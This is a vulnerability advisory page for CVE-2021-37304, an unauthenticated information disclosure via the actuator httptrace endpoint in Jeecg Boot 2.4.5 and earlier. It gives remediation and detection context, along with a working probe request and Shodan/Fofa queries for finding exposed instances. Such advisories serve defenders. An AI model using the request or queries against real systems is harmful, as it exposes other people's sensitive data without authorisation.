🔙 목록으로 돌아가기

CVE-2021-37304: Jeecg Boot <= 2.4.5 - Information Disclosure

TitleJeecg Boot <= 2.4.5 - Information Disclosure
Authorritikchaddha
SeverityHigh
ImpactAn attacker can exploit this vulnerability to gain sensitive information from the application.
RemediationUpgrade Jeecg Boot to a version higher than 2.4.5 to mitigate the vulnerability.
CVSS Score7.5
EPSS Score0.54819
CVE IDCVE-2021-37304
CWE IDCWE-732
Shodan Querytitle:"Jeecg-Boot"http.title:"jeecg-boot"
Fofa Querytitle="JeecgBoot 企业级低代码平台"title="jeecg-boot"title="jeecgboot 企业级低代码平台"
Tags cve2021 cve jeecg exposure vuln

🔍 Vulnerability Description

An Insecure Permissions issue in jeecg-boot 2.4.5 allows unauthenticated remote attackers to gain escalated privilege and view sensitive information via the httptrace interface.

🌐 HTTP Request

GET /jeecg-boot/actuator/httptrace/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:140.0) Gecko/20100101 Firefox/140.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-37304.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-37304.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A